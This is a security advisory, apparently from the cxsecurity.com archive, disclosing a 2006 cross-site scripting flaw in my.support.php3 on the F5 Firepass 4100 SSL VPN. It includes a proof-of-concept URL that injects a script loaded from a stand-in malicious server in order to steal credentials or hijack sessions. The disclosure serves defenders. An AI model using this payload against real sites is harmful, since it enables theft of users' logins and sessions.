XSS in Firepass 4100 SSL VPN v.5.4.2 (and probably others)

Risk: Low
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Vulnerability class : Cross-Site Scripting Discovery date : 2nd of February 2006 Remote : Yes Local : No Credit : ILION Research Labs, Geneva Switzerland Vulnerable : F5 Firepass 4100 SSL VPN v. 5.4.2 A XSS (Cross-Site-Scripting) vulnerability has been uncovered in my.support.php3 called through a Web browser on the F5 Firepass 4100 SSL VPN. This allows an attacker to submit a crafted link to users of the vulnerable Web application in order to abuse their trust and steal their authentication credentials or hijack their sessions. Trust abuse can be complete since the SSL certificate can appear as vouching for the trustworthiness of the website while the page actually displayed is hosted on a malicious third-party server (this can be done by using the <iframe> tag of IE for example). Proof-of-concept exploit : https://www.vulnerable_server.com/my.support.php3?c=1&s=username</title> <img src=http://MALICIOUS_SERVER.COM/EXPLOIT.JS>&#140;&#169;=en&charset=iso-8859- 1&uilangchar=en.iso-8859-1 where http://MALICIOUS_SERVER.COM/EXPLOIT.JS is a malicious JavaScript interpreted by the victim's navigator.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com


Back to Top